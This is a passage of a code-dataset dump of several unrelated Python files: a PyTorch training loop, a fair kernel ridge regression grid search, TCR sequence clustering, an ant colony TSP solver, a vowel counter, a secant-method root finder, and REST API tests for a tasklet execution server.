args.cuda:\n self.label = self.label.cuda()\n self.input = self.input.cuda()\n\n self.input = Variable(self.input)\n self.label = Variable(self.label)\n\n # logging training \n self.log_loss_train = plugins.Logger(args.logs, 'TrainLogger.txt')\n self.params_loss_train = ['Loss','Accuracy']\n self.log_loss_train.register(self.params_loss_train)\n\n # logging testing \n self.log_loss_test = plugins.Logger(args.logs, 'TestLogger.txt')\n self.params_loss_test = ['Loss','Accuracy']\n self.log_loss_test.register(self.params_loss_test)\n\n # monitor training\n self.monitor_train = plugins.Monitor()\n self.params_monitor_train = ['Loss','Accuracy']\n self.monitor_train.register(self.params_monitor_train)\n\n # monitor testing\n self.monitor_test = plugins.Monitor()\n self.params_monitor_test = ['Loss','Accuracy']\n self.monitor_test.register(self.params_monitor_test)\n\n # visualize training\n self.visualizer_train = plugins.Visualizer(self.port, 'Train')\n self.params_visualizer_train = {\n 'Loss':{'dtype':'scalar','vtype':'plot'},\n 'Accuracy':{'dtype':'scalar','vtype':'plot'},\n }\n self.visualizer_train.register(self.params_visualizer_train)\n\n # visualize testing\n self.visualizer_test = plugins.Visualizer(self.port, 'Test')\n self.params_visualizer_test = {\n 'Loss':{'dtype':'scalar','vtype':'plot'},\n 'Accuracy':{'dtype':'scalar','vtype':'plot'},\n }\n 
self.visualizer_test.register(self.params_visualizer_test)\n\n # display training progress\n self.print_train = '[%d/%d][%d/%d] '\n for item in self.params_loss_train:\n self.print_train = self.print_train + item + \" %.4f \"\n\n # display testing progress\n self.print_test = '[%d/%d][%d/%d] '\n for item in self.params_loss_test:\n self.print_test = self.print_test + item + \" %.4f \"\n\n self.evalmodules = []\n \n self.giterations = 0\n self.losses_test = {}\n self.losses_train = {}\n # print(self.model)\n\n def learning_rate(self, epoch):\n # training schedule\n # for CIFAR10\n ## return self.lr * ((0.1 ** int(epoch >= 60)) * (0.1 ** int(epoch >= 120))* (0.1 ** int(epoch >= 160)))\n # Felix added\n if self.dataset_train_name == 'CIFAR10':\n return self.lr * ((0.1 ** int(epoch >= 60)) * (0.1 ** int(epoch >= 90))* (0.1 ** int(epoch >= 120)))\n elif self.dataset_train_name == 'CIFAR100':\n return self.lr * ((0.1 ** int(epoch >= 80)) * (0.1 ** int(epoch >= 120))* (0.1 ** int(epoch >= 160)))\n elif self.dataset_train_name == 'MNIST':\n return self.lr * ((0.1 ** int(epoch >= 80)) * (0.1 ** int(epoch >= 120))* (0.1 ** int(epoch >= 160)))\n elif self.dataset_train_name == 'FRGC':\n return self.lr * ((0.1 ** int(epoch >= 80)) * (0.1 ** int(epoch >= 120))* (0.1 ** int(epoch >= 160)))\n elif self.dataset_train_name == 'ImageNet':\n decay = math.floor((epoch - 1) / 30)\n return self.lr * math.pow(0.1, decay)\n\n # return self.lr\n\n def get_optimizer(self, epoch, optimizer):\n lr = self.learning_rate(epoch)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return optimizer\n\n # not sure if this is working as it should\n def model_eval(self):\n self.model.eval()\n for m in self.model.modules():\n for i in range(len(self.evalmodules)):\n if isinstance(m, self.evalmodules[i]):\n m.train()\n\n def model_train(self):\n self.model.train()\n\n def train(self, epoch, dataloader):\n self.monitor_train.reset()\n data_iter = iter(dataloader)\n\n self.input.volatile = False\n self.label.volatile = False\n\n self.optimizer = self.get_optimizer(epoch+1, self.optimizer)\n\n # switch to train mode\n self.model_train()\n\n i = 0\n while i < len(dataloader):\n\n ############################\n # Update network\n ############################\n\n input,label = data_iter.next()\n i += 1\n\n batch_size = input.size(0)\n if batch_size == self.batch_size:\n self.input.data.resize_(input.size()).copy_(input)\n self.label.data.resize_(label.size()).copy_(label)\n\n output = self.model(self.input)\n loss = self.criterion(output,self.label)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # this is for classfication\n pred = output.data.max(1)[1]\n\n acc = float(pred.eq(self.label.data).cpu().sum()*100.0) / float(batch_size)\n self.losses_train['Accuracy'] = float(acc)\n self.losses_train['Loss'] = float(loss.data[0])\n self.monitor_train.update(self.losses_train, batch_size)\n print(self.print_train % tuple([epoch, self.nepochs, i, len(dataloader)] + [self.losses_train[key] for key in self.params_monitor_train]))\n\n loss = self.monitor_train.getvalues()\n self.log_loss_train.update(loss)\n self.visualizer_train.update(loss)\n return self.monitor_train.getvalues('Accuracy')\n\n def test(self, epoch, dataloader):\n self.monitor_test.reset()\n data_iter = iter(dataloader)\n\n self.input.volatile = True\n self.label.volatile = True\n\n # switch to eval mode\n self.model_eval()\n\n i = 0\n while i < len(dataloader):\n\n ############################\n # Evaluate Network\n 
############################\n\n input,label = data_iter.next()\n i += 1\n\n batch_size = input.size(0)\n if batch_size == self.batch_size:\n self.input.data.resize_(input.size()).copy_(input)\n self.label.data.resize_(label.size()).copy_(label)\n\n self.model.zero_grad()\n output = self.model(self.input)\n loss = self.criterion(output,self.label)\n\n # this is for classification\n pred = output.data.max(1)[1]\n acc = float(pred.eq(self.label.data).cpu().sum()*100.0) / float(batch_size)\n self.losses_test['Accuracy'] = float(acc)\n self.losses_test['Loss'] = float(loss.data[0])\n self.monitor_test.update(self.losses_test, batch_size)\n print(self.print_test % tuple([epoch, self.nepochs, i, len(dataloader)] + [self.losses_test[key] for key in self.params_monitor_test]))\n\n loss = self.monitor_test.getvalues()\n self.log_loss_test.update(loss)\n self.visualizer_test.update(loss)\n return self.monitor_test.getvalues('Accuracy')\n","repo_name":"juefeix/pnn.pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8873,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"3"} +{"seq_id":"32884392536","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport os\r\nimport sys\r\nimport multiprocess as mp\r\nimport itertools\r\nimport pickle\r\nimport time\r\n# import gpflow\r\n# import tensorflow as tf\r\nimport GPy\r\n# from IPython.display import display\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn import preprocessing\r\nfrom tqdm import tqdm\r\n\r\nimport perform_kernel_regression_fair_learing\r\nfrom perform_kernel_regression_fair_learing import FairLearning\r\nfrom perform_kernel_regression_fair_learing import fl_wrapper\r\nfrom perform_kernel_regression_fair_learing import FairLearning_process\r\nfrom perform_kernel_regression_fair_learing import centre_mat\r\nfrom perform_kernel_regression_fair_learing import cross_v\r\n\r\nfrom hyppo.independence import Hsic\r\n\r\n# for median_heuristic\r\nfrom numpy.random import permutation\r\nfrom scipy.spatial.distance import squareform, pdist, cdist\r\n\r\nimport time\r\n\r\n# %%\r\nX = pd.read_csv('X.csv')\r\ny = pd.read_csv('y.csv')\r\n\r\nX = X.values.reshape(X.shape)[:, 1:]\r\ny = y.values.reshape(y.shape)[:, 1:]\r\n# %%\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\r\n\r\n#%%\r\ndef save_csv(array_name, filename):\r\n pd.DataFrame(array_name).to_csv(filename + '.csv')\r\n\r\nsave_csv(x_train, 'x_train')\r\nsave_csv(x_test, 'x_test')\r\nsave_csv(y_train, 'y_train')\r\nsave_csv(y_test, 'y_test')\r\n\r\n#%%\r\nx_train = pd.read_csv('x_train.csv').values[:, 1:]\r\nx_test = pd.read_csv('x_test.csv').values[:, 1:]\r\ny_train = pd.read_csv('y_train.csv').values[:, 1:]\r\ny_test = pd.read_csv('y_test.csv').values[:, 1:]\r\n#%%\r\ns_train = x_train[:, 0].reshape(x_train.shape[0], 1)\r\ns_test = x_test[:, 0].reshape(x_test.shape[0], 1)\r\n# %%\r\n# TODO Set parameters for grid search\r\n# cross validation searching grid\r\ndef get_sigma_median_heuristic(X):\r\n n = X.shape[0]\r\n if n > 1000:\r\n X = X[permutation(n)[:1000], :]\r\n dists = squareform(pdist(X, 'euclidean'))\r\n median_dist = np.median(dists[dists > 0])\r\n sigma = median_dist / np.sqrt(2.)\r\n return sigma\r\n\r\n\r\nmedian_dis = get_sigma_median_heuristic(x_train)\r\ngenerated_sc_x_array = np.random.uniform(np.exp(-15), 1, 10)\r\nheuristic_sc_x_array = np.random.randn(10, ) + 
median_dis\r\nheuristic_sc_x_array = heuristic_sc_x_array[heuristic_sc_x_array > 0]\r\nsc_x_array = np.concatenate((generated_sc_x_array, heuristic_sc_x_array, np.array(median_dis).reshape(1, )))
\r\n\r\nsc_s_array = np.array([0.5])  # np.random.uniform(0,5,25)\r\n\r\nsc_x_array.sort()\r\n\r\n# remove unnecessary sc_x values (e.g., two sc_x values that are too close to each other)\r\ntemp_sc_x_array = list()\r\njump = False\r\nbeacon = sc_x_array[0]\r\ntemp_sc_x_array.append(beacon)\r\nfor i in range(len(sc_x_array)):\r\n    if sc_x_array[i] - beacon >= 0.05:\r\n        temp_sc_x_array.append(sc_x_array[i])\r\n        beacon = sc_x_array[i]\r\n\r\nsc_x_array = np.array(temp_sc_x_array)\r\n\r\nlmda_array = (np.exp(-20 + np.arange(10)))\r\n\r\npar_list = list(itertools.product(sc_x_array, sc_s_array, lmda_array))
\r\n#%%\r\ntry:\r\n    with open('par_list_FKL', 'rb') as pf:\r\n        par_list = pickle.load(pf)\r\nexcept Exception:\r\n    pass\r\n\r\n# %%\r\n# define parallel function\r\ndef FairLearning_process(processes, x_train, y_train, x_test, y_test, s_train, s_test, par_list, mu_list, NumFolds):\r\n    # pool = mp.Pool(processes=processes)\r\n    # pool = Pool(processes=processes)\r\n    arg_list1 = [x_train, y_train, x_test, y_test, s_train, s_test, par_list, NumFolds]\r\n    arg_list = []\r\n    for mu in mu_list:\r\n        arg_list2 = arg_list1 + [mu]\r\n        arg_list.append(arg_list2)\r\n\r\n    # results = pool.map(fl_wrapper, arg_list)\r\n    with mp.Pool(processes) as pool:\r\n        # results = pool.map(fl_wrapper, arg_list)\r\n        results = pool.map(fl_wrapper, arg_list)\r\n    return results
\r\n\r\n\r\n# %%\r\npar_list_t = list(itertools.product(sc_x_array, sc_s_array, lmda_array))\r\n\r\n# y_pred, error_pred, HSIC = fair_regression(x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test,\r\n#                                            s_train=s_train, s_test=s_test)\r\n\r\npd.DataFrame(par_list_t).to_csv(\"par_list_t.csv\")\r\n# %%\r\nprocesses = 6\r\nNumFolds = 5\r\nmu_list = [0, 0.1, 0.7, 2.0, 5.0, 10.0]\r\n\r\nstime = time.time()\r\npara_result = FairLearning_process(processes=processes, x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test,\r\n                                   s_train=s_train, s_test=s_test, par_list=par_list, mu_list=mu_list,\r\n                                   NumFolds=NumFolds)\r\n\r\nprint(\"Time for FKRR CV search job: %.3f\" % (time.time() - stime))\r\nelapsed_time = time.time() - stime\r\n\r\ndata = [x_train, y_train, x_test, y_test]\r\nall_results = [data, para_result]
\r\n\r\n# %%\r\npickle_out1 = open(\"krr_result_gpy3\", \"wb\")\r\npickle.dump(all_results, pickle_out1)\r\npickle_out1.close()\r\n\r\n# %%\r\nimport pickle\r\n\r\nwith open('test', 'rb') as f:\r\n    all_results = pickle.load(f)\r\n\r\n'''\r\ndata: all_results[0][0:4] data = [x_train, y_train, x_test, y_test]\r\n\r\npara_result: all_results[1][0:6] para_result = results = pool.map(fl_wrapper, arg_list)\r\nfl_wrapper = results_list = [mu, y_pred, rmse, hsic, lmda, sc_x]\r\n\r\nmu: all_results[1][n][0]\r\ny_pred: all_results[1][n][1]\r\nrmse: all_results[1][n][2]\r\nhsic: all_results[1][n][3]\r\nlmda: all_results[1][n][4]\r\nsc_x: all_results[1][n][5]\r\n'''\r\n","repo_name":"BingliangLi/HSIC-regularized-Kernel-Ridge-Regression","sub_path":"fair_KRR.py","file_name":"fair_KRR.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"1528646868","text":"# By Neerja Thakkar for \"Balancing sensitivity and specificity in\n# distinguishing TCR groups by CDR sequence similarity\"\n# See README for license information\n\nfrom parse_sequences import txttoseqlist\nfrom cluster_CDRs import cluster_data\nfrom cluster_distance_scores import score_repertoire_twins, create_motif\nimport sys
\n\n\ndef cluster_and_get_distance_scores(subject_file, subject_twin_file, other_files, clustering_distance, output_dir):\n    log_file = open(output_dir + \"output.txt\", mode = 'w')\n    log_file.write(subject_file[11:])\n\n    Xlabels = txttoseqlist(subject_file, trim_first=True, remove_special=True)\n    Xlabelstwin = txttoseqlist(subject_twin_file, trim_first=True, remove_special=True)\n\n    print(\"clustering subject and their twin...\")\n\n    clusters = cluster_data(Xlabels, max_distance=clustering_distance)\n    clusters_twin = cluster_data(Xlabelstwin, max_distance=clustering_distance)\n\n    print(\"clustered subject and their twin\")
\n\n    # convert clusters to list of clusters\n    clusters_list = []\n    for key in clusters:\n        clusters_list.append(clusters[key])\n\n    twin_clusters_list = []\n    for key in clusters_twin:\n        twin_clusters_list.append(clusters_twin[key])\n\n    print(\"clustering other individuals...\")\n\n    other_clusterings = []\n    # get the other twins' repertoires\n    for file in other_files:\n        Xlabelsother = txttoseqlist(file, trim_first=True, remove_special=True)\n        clusters2other = cluster_data(Xlabelsother, max_distance=clustering_distance)\n\n        other_clusters = []\n        for key in clusters2other:\n            other_clusters.append(clusters2other[key])\n\n        other_clusterings.append(other_clusters)\n\n    print(\"clustered others\")\n    print(\"getting scores...\")
\n\n    # get the scores\n    scores = score_repertoire_twins(clusters_list, twin_clusters_list, other_clusterings, min_clust_size=4)\n    print(scores)\n\n    n = 1\n\n    for score_data in scores:\n        log_file.write(\"\\n\\ncluster #\" + str(n))\n        # print(score_data)\n        # print(\"parsing data...\\n\")\n\n        # parse score data\n        cluster = score_data[1]\n        twin_cluster = score_data[0][1]\n        twin_cluster_score = score_data[0][0]\n        log_file.write(\"\\ncluster is :\" + str(cluster))\n        log_file.write(\"\\nthe closest twin cluster is \" + str(twin_cluster))\n        log_file.write(\"\\ntheir score is: \" + str(twin_cluster_score))\n\n        # create motifs\n        create_motif(cluster, str(n) + \"_subject\", output_dir)\n        create_motif(twin_cluster, str(n) + \"_subject_twin\", output_dir)
\n\n        # calculate average distance to other clusters\n        total_dist = 0\n        count = 0\n        other_scores = []\n\n        for i in range(len(other_files)):\n            data = score_data[i+2]\n            repertoire = other_files[i][22:]\n            other_score = data[0]\n            other_cluster = data[2]\n            log_file.write(\"\\nscore with \" + str(repertoire) + \" is \" + str(other_score))\n            log_file.write(\"\\ncluster: \" + str(other_cluster))\n\n            create_motif(other_cluster, str(n) + \"_\" + str(repertoire), output_dir)\n\n            total_dist += other_score\n            count += 1\n            other_scores.append(other_score)\n\n        avg_score = total_dist/count\n        log_file.write(\"\\naverage score to another cluster is \" + str(avg_score))\n        log_file.write(\"\\nthe closest score to another cluster is \" + str(min(other_scores)))\n\n        log_file.write(' ')\n\n        n += 1
\n\n\n\n# inputs (from command line): list of cluster files, directory, title\nif len(sys.argv) < 5:\n    print(\"need the following arguments: output directory, threshold to cluster to, subject to analyze, their twin, all repertoire files\")\n    print(\"twin to analyze: TwA1, TwA2, TwC1, TwC2, TwD1, TwD2\")\n    sys.exit()\n\noutput_directory = sys.argv[1]\ndistance = float(sys.argv[2])\nsubject = sys.argv[3]\ntwin = sys.argv[4]\nall_files = sys.argv[5].split(',')\n\nfilename = \"\"\ntwin_file = \"\"\nfor file in all_files:\n    if subject in file:\n        filename = file\n    if twin in file:\n        twin_file = file\n\nother_files = []\nfor file in all_files:\n    if subject not in file and twin not in file:\n        other_files.append(file)\n\ncluster_and_get_distance_scores(filename, twin_file, other_files, distance, output_directory)\n","repo_name":"neerjathakkar/Distinguishing-TCR-Groups","sub_path":"twins_distance_scores.py","file_name":"twins_distance_scores.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"21677131700","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nnp.random.seed(6)\nnum_points = 8\n\npoints = range(num_points)\npoints_coordinate = np.random.rand(num_points, 2)\ndistance_matrix = np.zeros(shape=(num_points, num_points))\nfor i in range(num_points):\n    for j in range(num_points):\n        distance_matrix[i][j] = np.linalg.norm(points_coordinate[i] - points_coordinate[j], ord=2)\nprint('distance_matrix is: \\n', distance_matrix)
\n\n\ndef demo_func(points):\n    num_points, = points.shape\n    total_distance = 0\n    for i in range(num_points - 1):\n        total_distance += distance_matrix[points[i], points[i + 1]]\n    total_distance += distance_matrix[points[i + 1], points[0]]\n    return total_distance\n\n\n# %%\nimport numpy as np\n\nfunc = len(points)\nn = 8  # number of cities\nm = 20  # number of ants\nalpha = 1  # importance of pheromone\nbeta = 1  # importance of fitness\nrho = 0.1  # pheromone evaporation rate\n\niter_max = 800\nTau = np.ones((n, n))  # pheromone matrix\nTable = np.zeros((m, n)).astype(int)  # the actual route of each ant in one generation\n\n# x_g_best, y_best = [], []  # record the best solution of each generation\nx_best_history, y_best_history = [], []
\n\n# %%\nfor i in range(n):\n    distance_matrix[i, i] = 1e-10  # avoid division-by-zero errors\n\nfor i in range(iter_max):  # for every iteration\n    prob_matrix = (Tau ** alpha) * (1 / distance_matrix) ** beta  # transition probability; no normalization needed\n    for j in range(m):  # for every ant\n        Table[j, 0] = 0  # start point; it could be random, but it makes no difference\n        for k in range(n - 1):  # for every node the ant reaches\n            taboo_set = set(Table[j, :k + 1])  # points already visited, including the current one, cannot be revisited\n            allow_list = list(set(points) - taboo_set)  # choose among the remaining points\n            prob = prob_matrix[Table[j, k], allow_list]\n            prob = prob / prob.sum()\n            next_point = np.random.choice(allow_list, size=1, p=prob)[0]\n            Table[j, k + 1] = next_point\n\n    # compute the tour distances\n    y = np.array([demo_func(i) for i in Table])\n\n    # record the best result so far\n    index_best = y.argmin()\n    x_best, y_best = Table[index_best, :], y[index_best]\n    x_best_history.append(x_best)\n    y_best_history.append(y_best)
\n\n    # compute the pheromone to be newly deposited\n    delta_tau = np.zeros((n, n))\n    for j in range(m):  # every ant\n        for k in range(n - 1):  # every node\n            n1, n2 = Table[j, k], Table[j, k + 1]\n            delta_tau[n1, n2] += 1 / y[j]\n        n1, n2 = Table[j, n - 1], Table[j, 0]\n        delta_tau[n1, n2] += 1 / y[j]\n\n    # pheromone evaporation + pheromone deposit\n    Tau = (1 - rho) * Tau + delta_tau\n\nTau\n# %%\ny_best_history = np.array(y_best_history)\na = y_best_history.argmin()\nbest_points = x_best_history[a]\n\n# %%\nfig, ax = plt.subplots(1, 1)\nplt.plot(pd.DataFrame(y_best_history).cummin(axis=0))\n\nfig, ax = plt.subplots(1, 1)\nbest_points_ = np.concatenate([best_points, [best_points[0]]])\nbest_points_coordinate = points_coordinate[best_points_, :]\nax.plot(best_points_coordinate[:, 0], best_points_coordinate[:, 1], 'o-r')\nplt.show()\n","repo_name":"scarecrowyu/scikit-opt","sub_path":"ACA.py","file_name":"ACA.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11212781367","text":"def contar_vocales(frase):\n    conteo_vocales = {'a': 0, 'e': 0, 'i': 0, 'o': 0, 'u': 0}\n    frase = frase.lower()\n    for char in frase:\n        if char in conteo_vocales:\n            conteo_vocales[char] += 1\n    return conteo_vocales\n\nfrase = input(\"Introduce una frase: 
\")\nconteo = contar_vocales(frase)\n\nprint(\"Conteo de vocales en la frase:\")\nfor vocal, conteo_vocal in conteo.items():\n print(f\"{vocal}: {conteo_vocal}\")","repo_name":"MarioDev98/CuentaVocales-Python","sub_path":"VocalesPython.py","file_name":"VocalesPython.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22568713283","text":"import math\r\n\r\n\r\ndef intersection(function, x0, x1):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n function : function\r\n function is the function we want to find its root\r\n x0, x1 : numbers\r\n The interval in which to search for a solution\r\n \r\n Return\r\n ------\r\n x_n2 : number\r\n \"\"\"\r\n x_n = x0\r\n x_n1 = x1\r\n while True:\r\n x_n2 = x_n1 - (\r\n function(x_n1) / ((function(x_n1) - function(x_n)) / (x_n1 - x_n))\r\n )\r\n if abs(x_n2 - x_n1) < 10 ** -5:\r\n return x_n2\r\n x_n = x_n1\r\n x_n1 = x_n2\r\n\r\ndef f(x):\r\n return math.pow(x, 3) - 2*x - 5\r\n\r\nif __name__ == \"__main__\":\r\n print(intersection(f, 3, 3.5))","repo_name":"acekun141/Python","sub_path":"arithmetic_analysis/intersection.py","file_name":"intersection.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29034523717","text":"import base64\nimport copy\nimport http.client\nimport json\nimport typing\n\nimport requests\nimport uuid\nfrom google.protobuf import json_format\nfrom google.protobuf import message as proto_message\n\nfrom tasklet.experimental.examples.proto import fake_ya_make_pb2\n\nfrom tasklet.experimental.tests.common import models as test_models\nfrom tasklet.experimental.tests.common import server_mock\nfrom tasklet.experimental.tests.common import utils as test_utils\n\nfrom tasklet.api.v2 import well_known_structures_pb2\nfrom tasklet.api.v2 import tasklet_service_pb2\nfrom tasklet.api.v2 import data_model_pb2\n\n\ndef _format_execution_json(data: dict) -> dict:\n data2 = copy.deepcopy(data)\n data2.setdefault(\"status\", {}).setdefault(\"result\", {})\n buf = data_model_pb2.Execution()\n json_format.ParseDict(data2, buf)\n return json_format.MessageToDict(buf, including_default_value_fields=True)\n\n\ndef _execution_to_json(msg: data_model_pb2.Execution) -> dict:\n return _format_execution_json(json_format.MessageToDict(msg))\n\n\ndef _run_execution(\n tasklet_server: server_mock.TaskletServer,\n tasklet: test_models.Tasklet,\n build: test_models.Build,\n label: test_models.Label,\n message_obj: proto_message.Message,\n) -> dict:\n rv = requests.post(\n f\"{tasklet_server.api}/executions\",\n json={\n \"namespace\": tasklet.NS,\n \"tasklet\": tasklet.Name,\n \"label\": label.Name,\n \"input\": {\n \"serialized_data\": base64.b64encode(message_obj.SerializeToString()).decode()\n }\n }\n )\n\n test_utils.ensure_response_status(rv)\n execution_json = rv.json()[\"execution\"]\n assert execution_json[\"meta\"][\"build_id\"] == build.ID\n assert execution_json[\"meta\"][\"tasklet_id\"] == tasklet.ID\n assert execution_json[\"status\"][\"status\"] == \"E_EXECUTION_STATUS_EXECUTING\"\n return execution_json\n\n\ndef test_executions(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, registered_schema, None)\n label = 
tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n sample_input = well_known_structures_pb2.GenericBinary(\n payload=b\"foo-bar-baz\",\n )\n execution_json = _run_execution(tasklet_server, tasklet, build, label, sample_input)\n\n execution2_rv = requests.post(\n f\"{tasklet_server.api}/executions\",\n data=json.dumps({\n \"namespace\": namespace.name,\n \"tasklet\": tasklet.Name,\n \"label\": label.Name,\n \"input\": {\n \"serialized_data\": base64.b64encode(sample_input.SerializeToString()).decode(),\n }\n }),\n )\n test_utils.ensure_response_status(execution2_rv)\n\n execution2_json = execution2_rv.json()[\"execution\"]\n assert execution2_json[\"meta\"][\"build_id\"] == build.ID\n assert execution2_json[\"meta\"][\"tasklet_id\"] == tasklet.ID\n assert execution2_json[\"status\"][\"status\"] == \"E_EXECUTION_STATUS_EXECUTING\"\n\n # GET execution\n rv = requests.get(\n f\"{tasklet_server.api}/executions:getById\", params={\"id\": execution_json['meta']['id']},\n )\n test_utils.ensure_response_status(rv)\n assert _format_execution_json(rv.json()[\"execution\"]) == _format_execution_json(execution_json)\n\n for url, searchQuery in (\n (f\"{tasklet_server.api}/executions:listByTasklet\", {\"namespace\": namespace.name, \"tasklet\": tasklet.Name}),\n (f\"{tasklet_server.api}/executions:listByBuild\", {\"build_id\": build.ID}),\n ):\n rv = requests.get(url, params=searchQuery)\n test_utils.ensure_response_status(rv)\n\n execution_ids = set(x[\"meta\"][\"id\"] for x in rv.json()[\"executions\"])\n assert execution_ids == {execution_json[\"meta\"][\"id\"], execution2_json[\"meta\"][\"id\"]}\n assert all(x[\"meta\"][\"tasklet_id\"] == tasklet.ID for x in rv.json()[\"executions\"])\n assert all(x[\"meta\"][\"build_id\"] == build.ID for x in rv.json()[\"executions\"])\n\n next_page_query = copy.deepcopy(searchQuery)\n next_page_query.update({\"token\": rv.json()[\"token\"]})\n rv = requests.get(url, params=next_page_query)\n test_utils.ensure_response_status(rv)\n assert len(rv.json().get(\"executions\", [])) == 0\n\n\ndef test_executions_idempotent_create(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, registered_schema, None)\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n sample_input = well_known_structures_pb2.GenericBinary(\n payload=b\"foo-bar-baz\",\n )\n reqId = str(uuid.uuid4())\n rv = requests.post(\n f\"{tasklet_server.api}/executions\",\n headers={\n \"X-Request-ID\": reqId,\n },\n json={\n \"namespace\": tasklet.NS,\n \"tasklet\": tasklet.Name,\n \"label\": label.Name,\n \"input\": {\n \"serialized_data\": base64.b64encode(sample_input.SerializeToString()).decode()\n }\n }\n )\n test_utils.ensure_response_status(rv)\n execution_one = rv.json()[\"execution\"]\n rv = requests.post(\n f\"{tasklet_server.api}/executions\",\n headers={\n \"X-Request-ID\": reqId,\n },\n json={\n \"namespace\": tasklet.NS,\n \"tasklet\": tasklet.Name,\n \"label\": label.Name,\n \"input\": {\n \"serialized_data\": base64.b64encode(sample_input.SerializeToString()).decode()\n }\n }\n )\n test_utils.ensure_response_status(rv)\n execution_two = rv.json()[\"execution\"]\n assert execution_one[\"meta\"][\"id\"] == execution_two[\"meta\"][\"id\"]\n assert execution_one == execution_two\n\n\ndef test_executions_abort(tasklet_server: server_mock.TaskletServer, 
registered_schema: str):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, registered_schema, None)\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n sample_input = well_known_structures_pb2.GenericBinary(\n payload=b\"foo-bar-baz\",\n )\n execution_id = tasklet_server.create_execution(tasklet, label, sample_input)\n\n rv = requests.post(\n f\"{tasklet_server.api}/executions:abort\",\n json={\n \"id\": execution_id,\n \"reason\": \"ya peredumal!!!!\",\n }\n )\n test_utils.ensure_response_status(rv)\n\n rv = requests.post(\n f\"{tasklet_server.api}/executions:abort\",\n json={\n \"id\": execution_id,\n \"reason\": \"ostanovites!1111!!\",\n }\n )\n test_utils.ensure_response_status(rv, http.client.BAD_REQUEST)\n assert \"already aborted\" in rv.text\n\n rv = requests.get(\n f\"{tasklet_server.api}/executions:getById\", params={\"id\": execution_id},\n )\n test_utils.ensure_response_status(rv)\n assert rv.json()[\"execution\"][\"status\"][\"abort_request\"][\"author\"] == \"fake_default_user\"\n assert rv.json()[\"execution\"][\"status\"][\"abort_request\"][\"reason\"] == \"ya peredumal!!!!\"\n\n\ndef test_executions_abort_acl(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, registered_schema, None)\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n sample_input = well_known_structures_pb2.GenericBinary(\n payload=b\"foo-bar-baz\",\n )\n execution_id = tasklet_server.create_execution(tasklet, label, sample_input)\n rv = requests.post(\n f\"{tasklet_server.api}/executions:abort\",\n headers={\"Grpc-Metadata-X-Test-User\": \"user_unknown\"},\n json={\n \"id\": execution_id,\n \"reason\": \"ya peredumal!!!!\",\n }\n )\n test_utils.ensure_response_status(rv, http.client.FORBIDDEN)\n\n rv = requests.get(\n f\"{tasklet_server.api}/executions:getById\", params={\"id\": execution_id},\n )\n test_utils.ensure_response_status(rv)\n assert rv.json()[\"execution\"][\"status\"].get(\"abort_request\", None) is None\n\n\ndef _gen_test_data_bundle(\n tasklet_server: server_mock.TaskletServer,\n registered_schema: str,\n) -> (\n data_model_pb2.NamespaceMeta,\n test_models.Tasklet,\n test_models.Build,\n test_models.Label,\n fake_ya_make_pb2.FakeYaMakeInput,\n):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, None, {\n \"schema\": {\n \"simple_proto\": {\n \"schema_hash\": registered_schema,\n \"input_message\": \"tasklet_examples.FakeYaMakeInput\",\n \"output_message\": \"tasklet_examples.FakeYaMakeOutput\",\n },\n },\n })\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n typed_input = fake_ya_make_pb2.FakeYaMakeInput(\n branch=\"junk-branch\",\n revision=\"junk-revision\",\n arc_token=well_known_structures_pb2.SecretRef(\n id=\"sec1-XXXX\",\n version=\"ver1-YYY\",\n key=\"my_arc_token\"\n )\n )\n return namespace, tasklet, build, label, typed_input\n\n\ndef test_third_party_input_in_execution_grpc(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace, tasklet, build, label, typed_input = 
